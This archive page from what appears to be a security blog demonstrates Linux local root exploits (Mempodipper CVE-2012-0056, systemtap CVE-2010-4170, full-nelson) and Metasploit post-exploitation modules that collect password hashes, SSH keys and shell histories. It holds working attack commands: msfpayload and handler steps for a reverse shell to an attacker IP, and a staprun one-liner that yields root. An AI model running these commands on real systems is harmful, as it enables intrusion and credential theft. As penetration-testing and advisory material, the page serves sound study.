Posts tagged Linux

CVE-2012-0056 Mempodipper Linux Local Root Exploit Demo

Timeline :

Vulnerability discovered by zx2c4 (Jason A. Donenfeld)
Public release of the vulnerability the 2012-01-18
Exploit provided the 2012-01-23

PoC provided by :

zx2c4 (Jason A. Donenfeld)

Reference(s) :

CVE-2012-0056
EBD-ID-18411

Affected version(s) :

Linux kernel’s above or equal to 2.6.39 (32 bit or 64 bit).

Tested on Ubuntu 11.10 with :

Linux ubuntu 3.0.0-15-generic

Description :

Mempodipper is an exploit for CVE-2012-0056 exploiting an issue in the handling of the /proc/pid/mem writing functionality, where permissions are not being properly checked in the Linux kernel version 2.6.39 to current. A local, unprivileged user could use this flaw to escalate their privileges.

Commands :

whoami
gcc -o CVE-2012-0056-Mempodipper CVE-2012-0056-Mempodipper.c
./CVE-2012-0056-Mempodipper
whoami

Metasploit Linux Post Exploitation : Enumeration and Hash Dump

A new set of post exploitation scripts have been developed and integrated in the Metasploit framework repository. These scripts permit you to gather interesting information’s on a Linux target.

These Metasploit post exploitation scripts are normally supporting all Linux distributions. For the moment are only working with a “shell” session but Metasploit team is working on a version how is supporting a complete integration with meterpreter.

Linux enum_linux post exploitation script

This script will permit you to gather different datas from the target :

  • Hostname of the target.
  • Current running system user.
  • Linux distribution and version.
  • Complete running kernel version
  • Complete system users from “/etc/password”
  • Network configuration from “/sbin/ifconfig -a” command.
  • The routing configuration from “/sbin/route” command
  • All mounted drives list from the “/bin/mount -l” command.
  • Complete “iptables -L” command output. The “nat” and “mangle” tables are also gather with the “iptables -L -t nat” and “iptables -L -t mangle” commands.
  • DNS configuration from “/etc/resolv.conf
  • SSH server configuration from “/etc/ssh/sshd_config
  • Statics hosts entries from “/etc/hosts
  • Complete output of “/etc/password” file
  • Possible ssh keys located in “.ssh” folders on the entire system.
  • Installed softwares. Execution of “rpm -qa” for Fedora, Red Hat, SuSe, Mandrake and Oracle. Execution of “ls /var/log/packages” for Slackware. Execution of “dpkg -l” for Ubuntu and Debian. Execution of “equery list” for Gentoo. Execution of “/usr/bin/pacman -Q” for ArcLinux.
  • Installed services. Execution of “chkconfig –list” for Fedora, Red Hat, SuSe, Mandrake and Oracle. Some logfu commands for Mandrake. Execution of “/usr/bin/service –status-all” for Ubuntu and Debian. Execution of “/bin/rc-status –all” for Gentoo.
  • Possible “.bash_history” files located in each users home folder.
  • Also the module will try to do a screenshot of display “0:0” with the xwd command.

All these datas are transfered on your Metasploit box for further analysis. All gathered information’s are saved into a “loot/date” folder located into your “$HOME/.msf3” folder.

Linux enum_linux post exploitation script

Linux enum_linux post exploitation script

Linux enum_packages post exploitation script

This module is a sub module how will only focus on installed softwares. Execution of “rpm -qa” for Fedora, Red Hat, SuSe, Mandrake and Oracle. Execution of “ls /var/log/packages” for Slackware. Execution of “dpkg -l” for Ubuntu and Debian. Execution of “equery list” for Gentoo. Execution of “/usr/bin/pacman -Q” for ArcLinux

Linux enum_packages post exploitation script

Linux enum_packages post exploitation script

Linux enum_services post exploitation script

This module is a sub module how will only focus on installed services. Execution of “chkconfig –list” for Fedora, Red Hat, SuSe , Mandrake and Oracle. Some logfu commands for Mandrake. Execution of “/usr/bin/service –status-all” for Ubuntu and Debian. Execution of “/bin/rc-status –all” for Gentoo.

Linux enum_services post exploitation script

Linux enum_services post exploitation script

Linux hashdump post exploitation script

This module will gather “/etc/password” and “/etc/shadow” files.

Linux enum_services post exploitation script

Linux enum_services post exploitation script

Linux enum_cron post exploitation script

This module will enumerate cron jobs for all users on the system by executing the command “crontab -u #{user} -l” where “#{user}” is the user enumerated from “/etc/passwd” file.

Metasploit Linux enum_cron module

Metasploit Linux enum_cron module

Linux checkvm post exploitation script

This module will attempt to determine wether the targeted system is running inside of a virtual environment and will provide you the type of virtualization technology how is used. This module supports detection of Hyper-V, VMWare, VirtualBox, Xen, and QEMU/KVM. All informations are gathered by looking for virtualization informations with “/sbin/lsmod“, “dmesg” and “cat /proc/scsi/scsi” commands.

Linux checkvm post exploitation script

Linux checkvm post exploitation script

To test these scripts you only need to create an executable payload for Linux and follow these steps.

First create the payload with msfpayload and upload it to the targeted Linux.

sudo msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.178.21 LPORT=4444 X > test

Then in msfconsole, run the following commands.

use exploit/multi/handler
set PAYLOAD linux/x86/shell_reverse_tcp
set LHOST 192.168.178.21
exploit -j

After on the targeted Linux, execute the test payload

CVE-2010-4170 : systemtap Local Root Privilege Escalation Vulnerability

Timeline :

Vulnerability reported to vendors, by Tavis Ormandy, the 2010-11-15
Vulnerability corrected by vendors around the 2010-11-17

PoC provided by :

Tavis Ormandy

Reference(s) :

CVE-2010-4170

Affected version(s) :

Red Hat, Fedora, Debian, Ubuntu, etc.

Tested on Debian squeeze/sid with :

systemtap-runtime_1.0-2_i386.deb

Description :

It was discovered that staprun did not properly sanitize the environment before executing the modprobe command to load an additional kernel module. A local, unprivileged user could use this flaw to escalate their privileges.

Commands :

Require “systemtap-runtime” on Debian

id
printf “install uprobes /bin/sh” exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u whatever
id

full-nelson.c Linux Kernel local privilege escalation

Timeline :

CVE-2010-3849 reported by Nelson Elhagethe the 2010-10-18
CVE-2010-3850 reported by Nelson Elhagethe the 2010-10-18
CVE-2010-4258 reported by Nelson Elhagethe the 2010-12-02

PoC provided by :

Dan Rosenberg
Nelson Elhage

Reference(s) :

CVE-2010-3849
CVE-2010-3850
CVE-2010-4258

Affected version(s) :

All Linux Kernel versions previous to the 2.6.37 version

Tested on Ubuntu 10.10 server

Description :

This exploit leverages three vulnerabilities to get root, all of which were discovered by Nelson Elhage.

Commands :

uname -a
uid
gcc full-nelson.c -o full-nelson
./full-neslon
uid

Go to Top